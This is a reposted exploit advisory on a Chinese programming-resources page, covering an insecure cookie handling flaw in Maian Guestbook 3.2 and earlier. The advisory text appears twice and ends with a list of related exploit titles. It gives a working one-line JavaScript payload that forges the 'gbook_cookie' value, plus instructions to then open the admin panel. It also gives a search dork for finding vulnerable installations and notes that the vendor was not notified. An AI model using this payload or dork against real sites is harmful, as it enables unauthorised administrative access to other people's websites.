您现在的位置是:网站首页> 编程资料编程资料
Maian Guestbook _Exploit_网络安全_
2023-05-24
383人已围观
简介 Maian Guestbook _Exploit_网络安全_
-[*] ================================================================================ [*]-
-[*] Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-
[*] Discovered By: S.W.A.T.
[*] E-Mail: svvateam[at]yahoo[dot]com
[*] Script Download: http://www.maianscriptworld.co.uk
[*] DORK: Powered by Maian Guestbook v3.2
[*] Vendor Has Not Been Notified!
[*] DESCRIPTION:
Maian Guestbook suffers from a insecure cookie, the admin panel only checks if the
cookie exists.
and not the content. so we can easyily craft a cookie and look like a admin.
[*] Vulnerability:
javascript:document.cookie = "gbook_cookie=1; path=/";
[*] NOTE/TIP:
after running the javascript, visit "/admin/index.php" to view admin area.
-[*] ================================================================================ [*]-
-[*] Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-
-[*] Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-
[*] Discovered By: S.W.A.T.
[*] E-Mail: svvateam[at]yahoo[dot]com
[*] Script Download: http://www.maianscriptworld.co.uk
[*] DORK: Powered by Maian Guestbook v3.2
[*] Vendor Has Not Been Notified!
[*] DESCRIPTION:
Maian Guestbook suffers from a insecure cookie, the admin panel only checks if the
cookie exists.
and not the content. so we can easyily craft a cookie and look like a admin.
[*] Vulnerability:
javascript:document.cookie = "gbook_cookie=1; path=/";
[*] NOTE/TIP:
after running the javascript, visit "/admin/index.php" to view admin area.
-[*] ================================================================================ [*]-
-[*] Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-
相关内容
- Maian Weblog _Exploit_网络安全_
- Maian Search _Exploit_网络安全_
- Maian Uploader _Exploit_网络安全_
- Safari Quicktime _Exploit_网络安全_
- MS Windows (.doc File) Malformed Pointers Denial of Service Exploit _Exploit_网络安全_
- ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities _Exploit_网络安全_
- MFORUM 0.1a Arbitrary Add-Admin Vulnerability _Exploit_网络安全_
- CodeDB (list.php lang) Local File Inclusion Vulnerability _Exploit_网络安全_
- Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit _Exploit_网络安全_
- Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only) _Exploit_网络安全_
